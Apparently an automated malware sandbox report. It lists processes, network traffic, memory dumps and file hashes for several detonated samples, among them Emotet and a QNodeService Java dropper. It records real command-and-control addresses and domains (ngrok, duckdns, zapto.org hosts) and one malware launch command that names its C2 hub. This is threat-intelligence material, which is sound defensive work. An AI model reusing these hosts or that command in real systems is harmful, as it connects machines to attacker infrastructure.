| PID 5032 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe | C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe
"C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe"
C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe
"C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 71.57.180.213:80 | tcp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| SE | 185.86.148.68:443 | tcp | |
| US | 168.235.82.183:8080 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| EC | 181.113.229.139:443 | tcp | |
| CO | 181.134.9.162:80 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| GB | 217.199.160.224:8080 | tcp | |
| ZA | 105.209.235.113:8080 | tcp |
Files
memory/5032-0-0x0000000002260000-0x000000000226C000-memory.dmp
memory/5032-4-0x0000000002250000-0x0000000002259000-memory.dmp
C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe
| MD5 | 6becbc70725f55f6e6dbe66f383f82bf |
| SHA1 | 7ea5f70e20171e23ccec3c18da638b78dcadfc5c |
| SHA256 | 93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1 |
| SHA512 | e3d8815ea584ec745bc103494e123ca489bdc8b8599745548acab449b9630a7e4a8d47c63db752aee63d18d1fec10f961f2f9c4cdc2324c26460c80421e09957 |
memory/5032-6-0x0000000000400000-0x0000000000475000-memory.dmp
memory/2548-7-0x00000000020C0000-0x00000000020CC000-memory.dmp
memory/2548-11-0x00000000020C0000-0x00000000020CC000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
159s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 3.tcp.ngrok.io | N/A | N/A |
| N/A | 3.tcp.ngrok.io | N/A | N/A |
| N/A | 3.tcp.ngrok.io | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\fb5d110ced698b06c6cb8c7112792a2d37c579dcd9bde808310cb8dc88e16d9c.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\fb5d110ced698b06c6cb8c7112792a2d37c579dcd9bde808310cb8dc88e16d9c.exe
"C:\Users\Admin\AppData\Local\Temp\fb5d110ced698b06c6cb8c7112792a2d37c579dcd9bde808310cb8dc88e16d9c.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.tcp.ngrok.io | udp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.131.123.134:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.tcp.ngrok.io | udp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 3.138.228.94:24041 | 3.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 3.tcp.ngrok.io | udp |
| US | 18.220.222.33:24041 | 3.tcp.ngrok.io | tcp |
| US | 18.220.222.33:24041 | 3.tcp.ngrok.io | tcp |
| US | 18.220.222.33:24041 | 3.tcp.ngrok.io | tcp |
| US | 18.220.222.33:24041 | 3.tcp.ngrok.io | tcp |
Files
memory/2512-0-0x00007FFEC6EE5000-0x00007FFEC6EE6000-memory.dmp
memory/2512-1-0x00007FFEC6C30000-0x00007FFEC75D1000-memory.dmp
memory/2512-2-0x000000001B7E0000-0x000000001BCAE000-memory.dmp
memory/2512-3-0x000000001BD60000-0x000000001BE06000-memory.dmp
memory/2512-4-0x000000001BED0000-0x000000001BF32000-memory.dmp
memory/2512-5-0x00007FFEC6C30000-0x00007FFEC75D1000-memory.dmp
memory/2512-6-0x00007FFEC6EE5000-0x00007FFEC6EE6000-memory.dmp
memory/2512-7-0x00007FFEC6C30000-0x00007FFEC75D1000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\file(1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 | C:\Users\Admin\AppData\Local\Temp\file(1).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\file(1).exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\file(1).exe
"C:\Users\Admin\AppData\Local\Temp\file(1).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yukselofficial.duckdns.org | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | 25.69.169.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yukselofficial.duckdns.org | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | yukselofficial.duckdns.org | udp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 192.169.69.25:5552 | yukselofficial.duckdns.org | tcp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
| US | 192.169.69.25:5552 | tcp |
Files
memory/3908-0-0x00007FFEEBD85000-0x00007FFEEBD86000-memory.dmp
memory/3908-2-0x000000001C020000-0x000000001C4EE000-memory.dmp
memory/3908-1-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp
memory/3908-3-0x000000001BA10000-0x000000001BAB6000-memory.dmp
memory/3908-4-0x000000001C5B0000-0x000000001C612000-memory.dmp
memory/3908-5-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp
memory/3908-6-0x00007FFEEBD85000-0x00007FFEEBD86000-memory.dmp
memory/3908-7-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp
memory/3908-8-0x00007FFEEBAD0000-0x00007FFEEC471000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
144s
Command Line
Signatures
QNodeService
Qnodeservice family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3492 wrote to memory of 4760 | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Program Files\Java\jre-1.8\bin\javaw.exe |
| PID 3492 wrote to memory of 4760 | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Program Files\Java\jre-1.8\bin\javaw.exe |
| PID 4760 wrote to memory of 1972 | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe |
| PID 4760 wrote to memory of 1972 | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe |
Processes
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\jar.jar
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\b7184e14.tmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain tmv2020.zapto.org
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.22.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.22.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tmv2020.zapto.org | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/3492-2-0x000001B849A00000-0x000001B849C70000-memory.dmp
memory/3492-14-0x000001B849C70000-0x000001B849C80000-memory.dmp
memory/3492-15-0x000001B849C80000-0x000001B849C90000-memory.dmp
memory/3492-16-0x000001B849C90000-0x000001B849CA0000-memory.dmp
memory/3492-18-0x000001B849CA0000-0x000001B849CB0000-memory.dmp
memory/3492-20-0x000001B849CB0000-0x000001B849CC0000-memory.dmp
memory/3492-22-0x000001B849CC0000-0x000001B849CD0000-memory.dmp
memory/3492-24-0x000001B849CD0000-0x000001B849CE0000-memory.dmp
memory/3492-26-0x000001B8483C0000-0x000001B8483C1000-memory.dmp
memory/3492-27-0x000001B849CE0000-0x000001B849CF0000-memory.dmp
memory/3492-29-0x000001B849CF0000-0x000001B849D00000-memory.dmp
memory/3492-31-0x000001B849A00000-0x000001B849C70000-memory.dmp
memory/3492-32-0x000001B849D00000-0x000001B849D10000-memory.dmp
memory/3492-36-0x000001B849D10000-0x000001B849D20000-memory.dmp
memory/3492-35-0x000001B849C80000-0x000001B849C90000-memory.dmp
memory/3492-34-0x000001B849C70000-0x000001B849C80000-memory.dmp
memory/3492-44-0x000001B849D30000-0x000001B849D40000-memory.dmp
memory/3492-47-0x000001B849D60000-0x000001B849D70000-memory.dmp
memory/3492-49-0x000001B849C90000-0x000001B849CA0000-memory.dmp
memory/3492-48-0x000001B849D70000-0x000001B849D80000-memory.dmp
memory/3492-46-0x000001B849D50000-0x000001B849D60000-memory.dmp
memory/3492-45-0x000001B849D40000-0x000001B849D50000-memory.dmp
memory/3492-43-0x000001B849D20000-0x000001B849D30000-memory.dmp
memory/3492-52-0x000001B849D80000-0x000001B849D90000-memory.dmp
memory/3492-51-0x000001B849CA0000-0x000001B849CB0000-memory.dmp
memory/3492-55-0x000001B849D90000-0x000001B849DA0000-memory.dmp
memory/3492-54-0x000001B849CB0000-0x000001B849CC0000-memory.dmp
memory/3492-58-0x000001B849DA0000-0x000001B849DB0000-memory.dmp
memory/3492-57-0x000001B849CC0000-0x000001B849CD0000-memory.dmp
memory/3492-63-0x000001B849DB0000-0x000001B849DC0000-memory.dmp
memory/3492-62-0x000001B849CD0000-0x000001B849CE0000-memory.dmp
memory/3492-65-0x000001B849DC0000-0x000001B849DD0000-memory.dmp
memory/3492-64-0x000001B849CE0000-0x000001B849CF0000-memory.dmp
memory/3492-69-0x000001B849DD0000-0x000001B849DE0000-memory.dmp
memory/3492-68-0x000001B849CF0000-0x000001B849D00000-memory.dmp
memory/3492-74-0x000001B849DE0000-0x000001B849DF0000-memory.dmp
memory/3492-73-0x000001B849D00000-0x000001B849D10000-memory.dmp
memory/3492-77-0x000001B849DF0000-0x000001B849E00000-memory.dmp
memory/3492-76-0x000001B849D10000-0x000001B849D20000-memory.dmp
memory/3492-87-0x000001B849E10000-0x000001B849E20000-memory.dmp
memory/3492-86-0x000001B849E00000-0x000001B849E10000-memory.dmp
memory/3492-85-0x000001B849D70000-0x000001B849D80000-memory.dmp
memory/3492-84-0x000001B849D60000-0x000001B849D70000-memory.dmp
memory/3492-83-0x000001B849D50000-0x000001B849D60000-memory.dmp
memory/3492-82-0x000001B849D40000-0x000001B849D50000-memory.dmp
memory/3492-81-0x000001B849D30000-0x000001B849D40000-memory.dmp
memory/3492-80-0x000001B849D20000-0x000001B849D30000-memory.dmp
memory/3492-89-0x000001B849D80000-0x000001B849D90000-memory.dmp
memory/3492-90-0x000001B849E20000-0x000001B849E30000-memory.dmp
memory/3492-97-0x000001B849E40000-0x000001B849E50000-memory.dmp
memory/3492-96-0x000001B849DA0000-0x000001B849DB0000-memory.dmp
memory/3492-95-0x000001B849E30000-0x000001B849E40000-memory.dmp
memory/3492-94-0x000001B8483C0000-0x000001B8483C1000-memory.dmp
memory/3492-93-0x000001B849D90000-0x000001B849DA0000-memory.dmp
memory/3492-99-0x000001B849DB0000-0x000001B849DC0000-memory.dmp
memory/3492-100-0x000001B849E50000-0x000001B849E60000-memory.dmp
memory/3492-104-0x000001B849E60000-0x000001B849E70000-memory.dmp
memory/3492-106-0x000001B849DD0000-0x000001B849DE0000-memory.dmp
memory/3492-107-0x000001B849E70000-0x000001B849E80000-memory.dmp
memory/3492-103-0x000001B849DC0000-0x000001B849DD0000-memory.dmp
memory/3492-109-0x000001B849E80000-0x000001B849E90000-memory.dmp
memory/3492-108-0x000001B849DE0000-0x000001B849DF0000-memory.dmp
memory/3492-112-0x000001B849DF0000-0x000001B849E00000-memory.dmp
memory/3492-116-0x000001B849EA0000-0x000001B849EB0000-memory.dmp
memory/3492-115-0x000001B849E10000-0x000001B849E20000-memory.dmp
memory/3492-114-0x000001B849E00000-0x000001B849E10000-memory.dmp
memory/3492-118-0x000001B849EB0000-0x000001B849EC0000-memory.dmp
memory/3492-113-0x000001B849E90000-0x000001B849EA0000-memory.dmp
memory/3492-121-0x000001B849E20000-0x000001B849E30000-memory.dmp
memory/3492-123-0x000001B849EC0000-0x000001B849ED0000-memory.dmp
memory/3492-122-0x000001B849E30000-0x000001B849E40000-memory.dmp
memory/3492-125-0x000001B849ED0000-0x000001B849EE0000-memory.dmp
memory/3492-128-0x000001B849EE0000-0x000001B849EF0000-memory.dmp
memory/3492-127-0x000001B849E40000-0x000001B849E50000-memory.dmp
memory/3492-131-0x000001B849E50000-0x000001B849E60000-memory.dmp
memory/3492-134-0x000001B849EF0000-0x000001B849F00000-memory.dmp
memory/3492-136-0x000001B849F00000-0x000001B849F10000-memory.dmp
memory/3492-138-0x000001B849F10000-0x000001B849F20000-memory.dmp
memory/3492-137-0x000001B849E70000-0x000001B849E80000-memory.dmp
memory/3492-135-0x000001B849E60000-0x000001B849E70000-memory.dmp
memory/3492-142-0x000001B849F20000-0x000001B849F30000-memory.dmp
memory/3492-141-0x000001B849E90000-0x000001B849EA0000-memory.dmp
memory/3492-140-0x000001B849E80000-0x000001B849E90000-memory.dmp
memory/3492-144-0x000001B849F30000-0x000001B849F40000-memory.dmp
memory/3492-147-0x000001B849F40000-0x000001B849F50000-memory.dmp
memory/3492-146-0x000001B849EA0000-0x000001B849EB0000-memory.dmp
memory/3492-151-0x000001B849F50000-0x000001B849F60000-memory.dmp
memory/3492-150-0x000001B849EB0000-0x000001B849EC0000-memory.dmp
memory/3492-153-0x000001B849EC0000-0x000001B849ED0000-memory.dmp
memory/3492-154-0x000001B849F60000-0x000001B849F70000-memory.dmp
memory/3492-156-0x000001B849ED0000-0x000001B849EE0000-memory.dmp
memory/3492-157-0x000001B849F70000-0x000001B849F80000-memory.dmp
memory/3492-165-0x000001B849F90000-0x000001B849FA0000-memory.dmp
memory/3492-164-0x000001B849F80000-0x000001B849F90000-memory.dmp
memory/3492-163-0x000001B849EF0000-0x000001B849F00000-memory.dmp
memory/3492-162-0x000001B849EE0000-0x000001B849EF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\b7184e14.tmp
| MD5 | 9e8b6710fdd55ad0675295c2c3960732 |
| SHA1 | aed08772376bde9f848f335e77e2e3c3c230234d |
| SHA256 | f2fb2d0c469abc0add346ef809ad86e0194400d391a2e5429b8cbeea2711bbad |
| SHA512 | 26f94b0b9766e9c244297cbe4af78f1b09087fbe471f099b5a77f5ca76fd5c905ee4d36188af67dbd6dc2c7f8402c882d0d2503a288af277840a1025562eac96 |
memory/3492-169-0x000001B849FA0000-0x000001B849FB0000-memory.dmp
memory/3492-168-0x000001B849F00000-0x000001B849F10000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4760-184-0x00000262AE2C0000-0x00000262AE2C1000-memory.dmp
memory/4760-391-0x00000262AE2C0000-0x00000262AE2C1000-memory.dmp
memory/4760-414-0x00000262AE2C0000-0x00000262AE2C1000-memory.dmp
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\docs\public\cli-commands\npm-bugs\index.html
| MD5 | f90f275e978926536f0bb317618445ec |
| SHA1 | 53af356d83c3f4c126d8eb1d00f0ec009706d61e |
| SHA256 | 9bcbcc17a384eb21e2354d840eca645a29b2289e20ae87f3e965733b983c4a59 |
| SHA512 | 794b2ad581e0b9f1d914cbc586384e35ff556668482ac304e1c7983376feb9ac06e46b5579f2cee599c1ecca8c0798d961bfdfd102b7e53d1f77b6bdb3d413b3 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\cliui\node_modules\string-width\license
| MD5 | 5ad87d95c13094fa67f25442ff521efd |
| SHA1 | 01f1438a98e1b796e05a74131e6bb9d66c9e8542 |
| SHA256 | 67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec |
| SHA512 | 7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\code-point-at\license
| MD5 | 940fdc3603517c669566adb546f6b490 |
| SHA1 | df8b7ea6dff65e7dd31a4e2f852fb6f2b45b7aa3 |
| SHA256 | 6b18e4f3ea8443739a64c95ecf793b45e4a04748da67e4a1479c3f4bba520bd6 |
| SHA512 | 9e2cf5b0c3105c7ec24b8382a9c856fc3d41a6903f9817f57f87f670073884c366625bc7dee6468bb4cbd0c0f3b716f9c7c597058098141e5a325632ea736452 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\.travis.yml
| MD5 | b112fec5b79951448994711bbc7f6866 |
| SHA1 | b7358185786bf3d89e8442ac0a334467c5c2019b |
| SHA256 | c3d79e198270443970b49c4f3e136551eb6c7c81a2300b931ae32ce17dad0967 |
| SHA512 | d46e1c11a6604e413163a2092e1a9925adc7b5df48a07fa70e87dd0216e7ef432bed3f3c75bed4f1ad4d707b7aeddce63abfca3d4bd1c6e29f215f8e258d5737 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\.travis.yml
| MD5 | f11e385dcfb8387981201298f1f67716 |
| SHA1 | 9271796a1d21e59d1a2db06447adbae7441e76cf |
| SHA256 | 8021d98e405a58cd51b76bf2669b071be7815db2c68216403c1ca02989c1ec2e |
| SHA512 | fdcae76ecedb4a3306763cca3359c9be2b6d30a88a37c5527c1c4e9f64c53abb0c1369af05dc7e420437476f9f050c999492d31117e3a1c312bd17b35740efd5 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\writable.js
| MD5 | fcb52503b2a3fd35d025cde5a6782d15 |
| SHA1 | 2e47c9e030510f202245566f0fbf4e209f938bad |
| SHA256 | 0b99c6a91a40658c75ec7ad8671f02304e93b07bd412e49540b9655f2090e557 |
| SHA512 | 3b522c95217ca6517197a82d4752d14471c305becb0cb4a516746c4e985e911e07fecd02f3a6e0e9aaef306ab8689a34c05701db1794ad5769bbc760a1353c46 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\writable-browser.js
| MD5 | 817cf252e6005ac5ab0970dd15b05174 |
| SHA1 | ac035836aeb22cb1627b8630eba14e2ea4d7f653 |
| SHA256 | 0d92b48420b6f4ead3c22d6f9db562a232e502e54ca283122fb383828f7b3842 |
| SHA512 | 8fd9b47fa3dd8c5dae9e65cb98f65f8e69da84a4b152026bd28cc50d1be48590ca9d0c9ce2a2b9b27af318a54204233df36a005442050e922e9450192409d0a7 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\transform.js
| MD5 | 1c9d3713bbc3dbe2142da7921ab0cad4 |
| SHA1 | 4b1b8e22ca2572e5d5808e4b432d7599352c2282 |
| SHA256 | 62707b41fa0e51f0556a32f98c7306fa7ff2e76d65df0a614889b827c3f5eaab |
| SHA512 | e582281b62eb5ac45ae039a90f81e97c3c1e81a65caf1c09e355dd2eae05760f254058c5d83dac953271dd8b90ebdb8b1748a10388a23386a9a7e089294a4efd |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\README.md
| MD5 | f13ecdad6c52fe7ee74b98217316764a |
| SHA1 | c3d7c4bec741e70452f0da911a71307c77d91500 |
| SHA256 | 42294293978532e3523e7b09172e9da9cc1c0d1bd5d04baf4b9b984ed2088d0d |
| SHA512 | f6664185183bf970c7450e79be5707ea43119dab621583bd61f7080a8b0292845e8f7450836408371dd3ea12ce766af75413464d7082a445e0c29cffe7ff8c75 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\readable.js
| MD5 | 76a193a4bca414ffd6baed6e73a3e105 |
| SHA1 | 4dbf5e4e8a7223c0f3adf7a0ca8c28bc678292a0 |
